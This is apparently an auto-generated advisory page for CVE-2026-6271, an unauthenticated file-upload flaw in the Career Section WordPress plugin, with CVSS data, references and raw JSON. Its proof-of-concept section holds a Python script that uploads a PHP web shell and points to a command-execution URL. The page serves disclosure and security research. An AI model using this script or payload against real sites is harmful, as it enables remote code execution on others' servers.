Security Vulnerability Report
CVE-2026-6271 CVSS 9.8 CRITICAL

CVE-2026-6271

Published: 2026-05-14 07:16:21
Last Modified: 2026-05-14 14:28:41

Description

The Career Section plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 1.7 via the CV upload handler. This is due to missing file type validation. This makes it possible for unauthenticated attackers to upload files that may be executable, which makes remote code execution possible.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WordPress Career Section plugin <= 1.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target configuration
target = 'http://example.com'
upload_url = f'{target}/wp-admin/admin-ajax.php'  # Placeholder URL, actual path depends on plugin version

# Malicious PHP payload
php_payload = '<?php system($_GET["cmd"]); ?>'
files = {
    'file': ('shell.php', php_payload, 'application/octet-stream')
}
data = {
    'action': 'career_section_upload_action'  # Placeholder action
}

try:
    # Send upload request
    response = requests.post(upload_url, files=files, data=data)
    if response.status_code == 200:
        print("[+] File uploaded successfully.")
        print(f"[+] Check your shell at: {target}/wp-content/uploads/shell.php?cmd=whoami")
    else:
        print("[-] Upload failed.")
except Exception as e:
    print(f"Error: {e}")
```

References

- https://plugins.trac.wordpress.org/changeset/3507785/career-section
- https://plugins.trac.wordpress.org/changeset/3507912/career-section
- https://plugins.trac.wordpress.org/changeset/3507917/career-section
- https://www.wordfence.com/threat-intel/vulnerabilities/id/005d1abc-761d-4f9a-bc21-aad63e8efd66?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-6271",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-14T07:16:20.650",
    "lastModified": "2026-05-14T14:28:41.283",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Career Section plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 1.7 via the CV upload handler. This is due to missing file type validation. This makes it possible for unauthenticated attackers to upload files that may be executable, which makes remote code execution possible."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-434"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3507785/career-section",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3507912/career-section",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3507917/career-section",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/005d1abc-761d-4f9a-bc21-aad63e8efd66?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```